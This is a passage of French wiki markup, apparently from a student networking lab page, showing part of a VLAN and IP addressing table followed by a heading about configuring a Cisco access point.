| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| 10.60.25.2/24<br />
| 10.60.25.3/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==</div>Jturut